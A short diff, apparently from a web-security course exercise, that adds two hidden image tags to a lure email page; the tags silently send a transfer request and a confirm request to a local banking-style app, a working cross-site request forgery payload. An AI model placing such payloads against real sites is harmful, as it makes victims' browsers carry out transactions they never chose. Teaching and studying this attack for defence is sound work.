--- a/part3-18.csrf/src/csrf.html
+++ b/part3-18.csrf/src/csrf.html
@@ -5,6 +5,8 @@ Dear Sir.<br/>
 
 I would like you to present you with this great opportunity.
 
+<img src="http://localhost:8000/transfer/?to=alice&amount=10">
+<img src="http://localhost:8000/confirm">
 
 </body>
 
